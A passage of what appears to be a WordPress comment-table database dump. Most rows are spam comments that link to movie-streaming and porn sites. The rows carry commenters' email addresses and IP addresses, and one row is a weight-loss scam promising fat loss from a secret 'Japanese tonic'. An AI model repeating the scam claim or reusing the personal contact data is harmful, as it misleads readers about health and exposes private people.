Holly Main\r\nIf you no longer wish to hear from us, please reply this email.',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(1769,5352,'izle','nanalorca@gmail.com','https://www.filmmodu.org/','144.168.210.89','2021-01-14 02:27:47','2021-01-14 02:27:47','Say, you got a nice blog. Really looking forward to read more. Awesome. Cassondra Cale Heddie',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1770,5410,'filmi full izle','mombo_3@yahoo.com','https://www.filmmodu.org/','45.86.15.48','2021-01-14 02:56:34','2021-01-14 02:56:34','Lovely website! I am loving it!! Will be back later to read some more. I am bookmarking your feeds also. Agata Lance Riedel',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1822,5352,'filmi izle','sanchezhandymen@yahoo.com','https://www.filmyani.com/','45.128.246.48','2021-01-17 00:40:32','2021-01-17 00:40:32','Few weeks ago I ordered from Alldaychemist.com and Reliablerxpharmacy.com decided to make a video about my experience with it. Here is the video. Riki Bern Deloria',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1823,5410,'izle','mmina111@gmail.com','https://www.filmyani.com/','23.236.222.253','2021-01-17 01:11:41','2021-01-17 01:11:41','At this time it appears like WordPress is the preferred blogging platform out there right now. Faydra Leicester Rowell',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1827,2132,'johnanz','dobsonsmithio34aga3@yahoo.com','http://nexus.cct.lsu.edu:8000/nexus_uis/930','5.188.211.13','2021-01-17 10:22:28','2021-01-17 10:22:28','hE2qPu http://nexus.cct.lsu.edu:8000/nexus_uis/930',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1828,4674,'johnanz','dobsonsmithio34aga3@yahoo.com','http://nexus.cct.lsu.edu:8000/nexus_uis/930','5.188.211.13','2021-01-17 10:36:43','2021-01-17 10:36:43','XrXbD1 http://nexus.cct.lsu.edu:8000/nexus_uis/930',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1835,5410,'hd film izle','peaceloboman1@gmail.com','https://www.filmyani.com/','45.137.80.182','2021-01-17 21:06:12','2021-01-17 21:06:12','I think the admin of this site is truly working hard in support of his website, as here every information is quality based data. Brandice Rodolph Lyndsie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1836,5410,'full hd tek parça izle','oxjen69xo@yandex.com','https://www.filmyani.com/','45.137.43.88','2021-01-18 01:01:24','2021-01-18 01:01:24','Thank you your video is very helpful looking forward to watching the next one. Estrellita Jan Arnulfo',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1843,5410,'filmi izle','ronwiseman23@msn.com','https://www.filmyani.com/','45.136.231.60','2021-01-18 19:01:06','2021-01-18 19:01:06','Absolutely pent written content, Really enjoyed reading. Cristal Nicholas Carolynne',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1849,5354,'joker izle','sask_mom2many@gmail.com','https://www.filmyani.com/','2.56.101.227','2021-01-19 10:52:21','2021-01-19 10:52:21','You beget a bloody exciting website. I like the occupied poop that you accommodate with every article. Adda Dewain Noelani',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1878,5354,'sex porn','slgresham1@yahoo.com','https://www.filmyani.com/','185.164.57.206','2021-01-21 14:31:11','2021-01-21 14:31:11','Dead written subject matter, Really enjoyed studying. Tricia Jarrett Gazo',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1881,5410,'sex tube','nilesandson@gmail.com','https://www.filmyani.com/','45.136.231.23','2021-01-21 15:09:03','2021-01-21 15:09:03','I would like to thank you for the efforts you have put in penning this site. Luz Garrek Emelyne',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1882,5352,'dizi','saundershm@earthlink.net','https://www.filmyani.com/','45.87.248.39','2021-01-21 17:30:27','2021-01-21 17:30:27','In this article we will cover there is the God of War. Pat Natty Clein',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1889,5060,'yabanci dizi','srg1qkg@yahoo.com','https://www.filmyani.com/','45.142.28.223','2021-01-21 23:48:16','2021-01-21 23:48:16','The details talked about within the write-up are a number of the very best available. Chrysler Meredith Humberto',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1892,5054,'free porn','spidermntheonly_1@yahoo.com','https://www.filmyani.com/','185.95.157.180','2021-01-22 05:46:31','2021-01-22 05:46:31','I have the same problem. The thumbail of my YouTube video does not update despite using the Facebook Debugger and scrapping several times. Steffane Caddric Piper',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1907,4659,'dizi izle','siljejs@gmail.com','https://www.filmyani.com/','45.86.15.66','2021-01-23 12:43:45','2021-01-23 12:43:45','Your means of telling the whole thing in this article is truly pleasant, all can effortlessly be aware of it, Thanks a lot. Cynthie Thom Idolla',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1927,5352,'yabanci dizi','robinson_joyce@bellsouth.net','https://www.filmyani.com/','185.205.194.117','2021-01-25 14:29:38','2021-01-25 14:29:38','Very good article! We will be linking to this particularly great content on our site. Keep up the great writing. Darcey Sloane Shelman',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1938,2132,'markus','smithio34ga2s514@yahoo.com','https://beeg.x.fc2.com/','5.188.211.13','2021-01-26 13:53:25','2021-01-26 13:53:25','zjVDBO https://beeg.x.fc2.com/',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1939,4674,'markus','smithio34ga2s514@yahoo.com','https://beeg.x.fc2.com/','5.188.211.13','2021-01-26 14:06:50','2021-01-26 14:06:50','aXtvq8 https://beeg.x.fc2.com/',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1940,4713,'markus','smithio34ga2s514@yahoo.com','https://beeg.x.fc2.com/','5.188.211.13','2021-01-26 16:41:42','2021-01-26 16:41:42','9y1WJt https://beeg.x.fc2.com/',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1946,2132,'markus','smithio34ga1134@yahoo.com','https://buyzudena.web.fc2.com/','5.188.211.13','2021-01-27 13:09:43','2021-01-27 13:09:43','ZuVZi5 https://buyzudena.web.fc2.com/',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1947,4674,'markus','smithio34ga1134@yahoo.com','https://buyzudena.web.fc2.com/','5.188.211.13','2021-01-27 13:37:36','2021-01-27 13:37:36','xZvXCl https://buyzudena.web.fc2.com/',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1948,4713,'markus','smithio34ga1134@yahoo.com','https://buyzudena.web.fc2.com/','5.188.211.13','2021-01-27 13:59:52','2021-01-27 13:59:52','1nOHWM https://buyzudena.web.fc2.com/',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1970,4659,'naim izle','ographics@yandex.com','https://www.filmyani.com/','45.137.40.39','2021-01-29 15:00:34','2021-01-29 15:00:34','Everything is very open with a very clear clarification of the issues. It was truly informative. Your site is useful. Many thanks for sharing. Ilse Nial Giulio',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1971,5410,'yenilmezler','outlaw1950@bellsouth.net','https://filmkovasi.org/','45.92.247.221','2021-01-29 18:25:09','2021-01-29 18:25:09','Hello my loved one! I want to say that this post is awesome, great written and include almost all vital infos. Beverlee Mahmud Lalita',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1972,5352,'online','pixiegube@comcast.net','https://filmkovasi.org/','45.92.247.221','2021-01-29 18:32:02','2021-01-29 18:32:02','I like the efforts you have put in this, regards for all the great content. Kaitlin Kasper Kauslick',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1976,4659,'netflix','peacheshm2@yandex.com','https://filmkovasi.org/','193.8.231.213','2021-01-30 00:42:36','2021-01-30 00:42:36','I think this site holds some very excellent information for everyone : D. Perry Jamesy Annabella',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1978,5054,'yabanci','songsareliketattoos@gmail.com','https://filmkovasi.org/','182.54.239.108','2021-01-30 02:00:12','2021-01-30 02:00:12','That would be the end of this post. Here you will discover some sites that we believe you will appreciate, just click the hyperlinks. Cynthie Ethe Ulrica',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1986,5354,'yabanci','robertmichaelcarpenter@yahoo.com','https://filmkovasi.org/dil/turkce-altyazi','185.250.39.186','2021-01-30 10:16:06','2021-01-30 10:16:06','Thanks for sharing such a pleasant thought, piece of writing is fastidious, thats why i have read it fully Chlo Duky Farly',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1987,5410,'dublaj','robertaires@gmail.com','https://filmkovasi.org/dil/turkce-dublaj','45.92.247.39','2021-01-30 10:53:25','2021-01-30 10:53:25','My family members every time say that I am killing my time here at net, however I know I am getting knowledge everyday by reading thes fastidious articles. Corrina Hyatt Dagall',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1989,5410,'movie online','pantera19662000@yahoo.com','https://www.hdfilmcehennemi2.pw/','45.142.28.223','2021-01-30 12:25:28','2021-01-30 12:25:28','I got what you intend, thanks for posting. Woh I am happy to find this website through google. Anastassia Patty Katina',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1990,5410,'yabanci','steca@gmail.com','https://filmkovasi.org/en-cok-yorumlananlar','104.227.145.131','2021-01-30 13:32:56','2021-01-30 13:32:56','Curabitur sit amet mauris. Morbi in dui quis est pulvinar ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Netti Ryun Broida',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1992,5352,'Fernanda Mcgalliard','JanethTonnessen72590@gmail.com','https://rb.gy/dabx3z','69.162.162.136','2021-01-30 14:40:38','2021-01-30 14:40:38','drink this Japanese tonic in the morning to burn 3 lbs every 3.5 days. A doctor from Japan recently leaked the formula of a secret Japanese tonic that BURNS fat from your frame faster than anything else discovered… Shady figures behind the scenes were scrambling to keep this formula hidden to protect the profits of the pharma and weight loss industries… But the doctor secretly leaked it to the brother of Susan Atlee, a 45 year old Mom of 3 kids, after he saw Susan struck by a sudden heart attack she got from standing up too fast… With this ancient tonic alone she lost 54 pounds in 7 weeks without exercise (due to osteoarthritis in her left knee) and without restrictive diets… >> https://rb.gy/dabx3z',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','comment',0,0),(1994,5054,'movies','opticalwalt@yahoo.com','https://filmkovasi.org/kalite/720p','193.8.231.42','2021-01-30 16:16:52','2021-01-30 16:16:52','Incredible points. Outstanding arguments. Keep up the amazing work.| Sabrina Leupold Ricca',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1995,4659,'watch','mrkemrkvalent@yahoo.com','https://filmkovasi.org/dil/turkce-altyazi','45.142.28.62','2021-01-30 17:31:33','2021-01-30 17:31:33','However, today select longer only a luxury for your extremely wealthy. Avis Lay Joshia',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1996,5410,'netflix','prolific0118@yandex.com','https://filmkovasi.org/kategori/hint','45.145.56.247','2021-01-30 18:08:34','2021-01-30 18:08:34','Someone necessarily assist to make critically articles I would state. This is the first time I frequented your web page and thus far? I surprised with the research you made to make this particular submit incredible. Wonderful activity! Rachele Eb Bibbye',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1999,5352,'altyazili','rjtilley@rogers.com','https://filmkovasi.org/kategori/yerli-filmler','185.164.57.206','2021-01-30 21:53:14','2021-01-30 21:53:14','Great article. Really looking forward to read more. Jenni Erich Herald Rivkah Peyton Chemarin',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2003,5352,'filmkovasi','rolling_stone1@msn.com','https://filmkovasi.org/tur/korku','45.137.43.88','2021-01-31 00:10:33','2021-01-31 00:10:33','Quero acerta minha divida com a C&A e quero meu Cartao de volta tem como. Pamela Mead Oscar',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2009,5054,'online','orn_lark@gmail.com','https://www.hdfilmcehennemi2.pw/','104.227.145.131','2021-01-31 03:18:41','2021-01-31 03:18:41','Undeniably believe that which you said. Your favorite reason appeared to be on the web the easiest thing to be aware of. I say to you, I certainly get annoyed while people consider worries that they just do not know about. You managed to hit the nail upon the top as well as defined out the whole thing without having side-effects , people can take a signal. Will likely be back to get more. Thanks Kassie Giraud Feola',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2010,5410,'dublaj','musicdawkins@yahoo.ca','https://filmkovasi.org/kategori/marvell','45.92.247.67','2021-01-31 05:45:08','2021-01-31 05:45:08','There is definately a great deal to find out about this issue. I really like all the points you have made. Louisa Vance Allister',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2011,5352,'altyazili','sathiskumar65@yahoo.com','https://filmkovasi.org/yil/2020','45.86.15.150','2021-01-31 06:06:11','2021-01-31 06:06:11','I am looking to buy new laptop for me. And this article about best travel laptop sorted my problem. Because I asked to my friends about laptop which one to buy and getting to many options and I am totally confused now I am sorted and I am going wiht Dell XPS 13 Janette Lovell Portugal',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2012,5410,'dizi','samcynd@gmail.com','https://www.hdfilmcehennemi2.pw/','45.94.47.242','2021-01-31 07:14:11','2021-01-31 07:14:11','Great post! We are linking to this particularly great post on our site. Bell Meryl Golliner',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2015,5352,'altyazili','rvanderpool@rogers.com','https://www.hdfilmcehennemi2.pw/','45.154.58.127','2021-01-31 10:12:47','2021-01-31 10:12:47','A big thank you for your blog article. Much thanks again. Much obliged. Ertha Lannie Rhianna',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2016,5410,'online','noreast28@yandex.com','https://filmkovasi.org/dil/turkce-altyazi','45.142.28.38','2021-01-31 11:13:54','2021-01-31 11:13:54','Like!! Thank you for publishing this awesome article. Daveen Aaron Gorrian',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2017,5354,'online','mxsweetie@msn.com','https://filmkovasi.org/','182.54.239.65','2021-01-31 11:24:54','2021-01-31 11:24:54','I simply wish to reveal to you that I am new to blog posting and absolutely loved your write-up. Probably I am probably to bookmark your blog post . You truly have amazing article information. Delight In it for telling with us your own domain report Grace Gilbert Farnham',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2019,5352,'dublaj','pereirajo3246@yahoo.com','https://www.hdfilmcehennemi2.pw/','45.92.247.126','2021-01-31 15:38:50','2021-01-31 15:38:50','Select an internet host that offers unlimited disk area and bandwidth. Davita Stillmann Darian',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2021,5410,'netflix','salbert74@yahoo.com','https://filmkovasi.org/kalite/480p','2.56.101.27','2021-01-31 16:22:40','2021-01-31 16:22:40','Hello, I think your website might be having browser compatibility issues. When I look at your blog in Chrome, it looks fine but when opening in Internet Explorer, it has some overlapping. I just wanted to give you a quick heads up! Other then that, fantastic blog! Rita Brose Maje',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2022,5352,'altyazili','ringc45@gmail.com','https://www.hdfilmcehennemi2.pw/','185.250.39.247','2021-01-31 17:01:59','2021-01-31 17:01:59','You made some decent points there. I checked on the web to learn more about the issue and found most people will go along with your views on this web site. Paolina Andrej Stromberg',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2024,5352,'turkce','patritciam@gmail.com','https://www.hdfilmcehennemi2.pw/','45.136.231.92','2021-01-31 18:54:11','2021-01-31 18:54:11','Thanks for the blog post. Really thank you! Fantastic. Allsun Hamel Brabazon',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2026,5352,'online','oly659@yandex.com','https://filmkovasi.org/kalite/4k','185.95.157.194','2021-01-31 21:23:48','2021-01-31 21:23:48','Use our clash of clans hack with out survey and revel in Conflict of Clans game on most! Juliette Zackariah Boff',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2029,5054,'hindi movie','michelle_lance@msn.com','https://filmkovasi.org/kalite/480p','193.8.231.15','2021-01-31 22:47:35','2021-01-31 22:47:35','Some genuinely nice and useful information on this website, likewise I conceive the design and style contains excellent features. Dollie Morly Brien',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2032,5354,'yabanci','quav34@yahoo.com','https://www.hdfilmcehennemi2.pw/','45.92.247.67','2021-02-01 00:56:31','2021-02-01 00:56:31','I like the helpful information you provide in your articles. I will bookmark your weblog and check again here regularly. I am quite certain I will learn a lot of new stuff right here! Good luck for the next! Kalila Rolland Barcroft',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2033,5060,'filmkovasi','rhondarogers1095@msn.com','https://filmkovasi.org/','45.137.43.88','2021-02-01 01:05:14','2021-02-01 01:05:14','Curabitur sit amet mauris. Morbi in dui quis est pulvinar ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Cassandry Ingrim Krenn',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2035,5054,'movie online','sebastien.gheneyn@gmail.com','https://filmkovasi.org/','23.229.119.166','2021-02-01 04:46:10','2021-02-01 04:46:10','Pellentesque blandit adipiscing nibh, in molestie neque varius ac. Vivamus risus arcu, sagittis eu urna vitae, sagittis ornare erat. Morbi suscipit dui vel libero vestibulum, quis lacinia eros scelerisque. Revkah Aristotle Kimberley',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2036,5352,'watch','ogre@yandex.com','https://filmkovasi.org/en-cok-begenilenler','185.164.56.233','2021-02-01 04:55:57','2021-02-01 04:55:57','Interesting take on the period. High aristocracy and ordinary trade. Will be interesting to see how it all turns out. Has Lady Caroline her own secret love interest or is she as vacuous as she presents??? Berti Nevile Lowis',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2037,4713,'altyazili','paulwf@comcast.net','https://www.hdfilmcehennemi2.pw/','193.8.94.245','2021-02-01 06:25:47','2021-02-01 06:25:47','Hi there, I think your web site could possibly be having browser compatibility problems. When I take a look at your website in Safari, it looks fine but when opening in I. E., it has some overlapping issues. I merely wanted to give you a quick heads up! Besides that, excellent website! Moreen Alonso Delphinia',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2039,5352,'movies','olncarter@yahoo.com','https://filmkovasi.org/kategori/hint','185.95.157.96','2021-02-01 06:49:55','2021-02-01 06:49:55','After exploring a number of the blog posts on your web site, I seriously appreciate your way of writing a blog. I saved as a favorite it to my bookmark website list and will be checking back soon. Take a look at my website too and tell me your opinion. Othella Stewart Geraldine',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2041,4659,'online','rguzman1787@yahoo.com','https://filmkovasi.org/','45.130.255.62','2021-02-01 08:27:59','2021-02-01 08:27:59','which school offer masters in environmental management? Pamella Bale Gowrie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2042,5352,'watch','navigations@msn.com','https://filmkovasi.org/','45.87.248.231','2021-02-01 09:43:13','2021-02-01 09:43:13','Pretty component of content. I simply stumbled upon your website and in accession capital to say that I get in fact loved account your blog posts. Anyway I will be subscribing in your feeds or even I success you get admission to consistently fast. Ailis Pattie Cho',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2043,4713,'diziler','nefertey@mail.com','https://www.hdfilmcehennemi2.pw/','2.56.101.236','2021-02-01 10:14:52','2021-02-01 10:14:52','I used to be able to find good information from your blog articles. Abigael Neall Arleta',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2045,5352,'hindi movie','portena2@yandex.com','https://filmkovasi.org/','45.154.56.235','2021-02-01 12:17:17','2021-02-01 12:17:17','I genuinely appreciate your piece of work, Great post. Eimile Ingram Leann',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2046,5354,'hindi movie','scottdryer@yahoo.com','https://filmkovasi.org/tur/animasyon','45.154.58.13','2021-02-01 14:01:26','2021-02-01 14:01:26','tortor. Nam venenatis congue nibh. Donec posuere lacinia neque. Pellentesque vehicula. Nam eleifend ipsum. Vestibulum lectus diam, viverra vitae, tempor sit amet, eleifend eu, quam. Aenean aliquam ornare tellus. Donec vel ligula ut mauris pellentesque mattis. In neque leo, porta non, rutrum vel, sollicitudin a, libero. Pellentesque ornare mauris id odio. Aliquam erat volutpat. Aenean eget ante eget nunc feugiat lacinia. Duis ullamcorper consequat risus. Nunc at magna. Arluene Franklin Neila',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2047,5352,'tek part','rrvgiefer@gmail.com','https://filmkovasi.org/','45.9.122.163','2021-02-01 14:13:39','2021-02-01 14:13:39','Oh my benefits! an amazing post dude. Thanks Nonetheless I am experiencing concern with ur rss. Don?t recognize why Not able to register for it. Exists any individual obtaining identical rss trouble? Anybody that recognizes kindly react. Thnkx Stephie Maury Albers',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2050,5352,'netflix','mtymowz@yahoo.com','https://filmkovasi.org/','45.154.84.136','2021-02-01 21:56:05','2021-02-01 21:56:05','Right away I am ready to do my breakfast, once having my breakfast coming over again to read more news. Ashien Jose Sholes',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2051,5060,'dublaj','mwpalmcoast@yandex.com','https://filmkovasi.org/yil/2021','193.8.231.60','2021-02-01 23:21:39','2021-02-01 23:21:39','There are some fascinating points in time in this article but I don?t understand if I see every one of them facility to heart. There is some credibility yet I will hold viewpoint until I check into it even more. Excellent write-up, many thanks and we desire extra! Added to FeedBurner too Merissa Sherlocke Steffen',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2052,4713,'free movies','sargewife@gmail.com','https://www.hdfilmcehennemi2.pw/','193.8.94.118','2021-02-01 23:31:18','2021-02-01 23:31:18','Pretty! This was ann increibly wonderful article. Thanks for providing these details. Johnna Sebastien Sherri',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2053,5352,'tek part','sk9swirl@yandex.com','https://filmkovasi.org/','182.54.239.11','2021-02-01 23:55:27','2021-02-01 23:55:27','This paragraph provides clear idea for the new users of blogging, that really how to do running a blog.| Marinna Herbert Bryan',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2054,5060,'tek parca','mptre69@yahoo.com','https://filmkovasi.org/kategori/asya','45.130.255.252','2021-02-02 02:16:14','2021-02-02 02:16:14','hello!,I love your writing so so much! proportion we keep in touch extra about your article on AOL? I need an expert in this space to resolve my problem. May be that is you! Looking forward to look you. | Ruthanne Shawn Georgi',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(2055,5352,'dublaj','pappyjohnsband@yahoo.ca','https://filmkovasi.org/','198.154.92.124','2021-02-02 02:31:26','2021-02-02 02:31:26','Good article! We are linking to this particularly great content on our site. Keep up the great writing.| Darcie Ware Joycelin',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 